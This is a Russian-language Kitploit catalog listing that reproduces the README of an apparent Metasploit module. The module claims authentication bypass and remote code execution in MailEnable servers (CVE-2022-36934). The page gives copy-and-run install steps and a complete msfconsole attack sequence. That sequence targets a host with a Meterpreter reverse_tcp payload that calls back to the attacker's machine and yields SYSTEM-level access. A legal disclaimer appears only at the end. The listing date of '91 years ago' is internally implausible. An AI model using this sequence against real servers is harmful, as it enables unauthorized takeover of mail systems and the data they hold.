Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mailenable-cve-2022-36934 — Модуль Metasploit для MailEnable: обход аутентификации и удалённое выполнение кода (CVE-2022-36934) | Kitploit
Инструменты/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

Модуль Metasploit для MailEnable: обход аутентификации и удалённое выполнение кода (CVE-2022-36934)

Репозиторий
91 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Модуль эксплойта MailEnable CVE-2022-36934

Metasploit License

Модуль Metasploit для уязвимости обхода аутентификации в MailEnable (CVE-2022-36934), приводящей к удалённому выполнению кода.

📌 Возможности

  • Эксплуатирует некорректную санитизацию ввода в SMTP/POP3 MailEnable
  • Поддерживает цели Windows x86 и x64
  • Не требует взаимодействия с пользователем (автоматическая активация через специально сформированное письмо)
  • Работает с версиями MailEnable < 10.40

🚀 Установка

  1. Скопируйте в каталог модулей Metasploit:
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. Перезагрузите модули в msfconsole:

reload_all

  1. Использование:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 Протестировано на:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 Технические подробности:

Уязвимость: обход аутентификации через SQL-подобный синтаксис в SMTP/POP3

Вектор атаки: сеть (порты 25/110)

Привилегии: выполнение от имени сервисной учётной записи MailEnable (часто SYSTEM)

⚠️ Правовое предупреждение:

Этот инструмент предназначен только для авторизованного тестирования. Никогда не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Скачать инструмент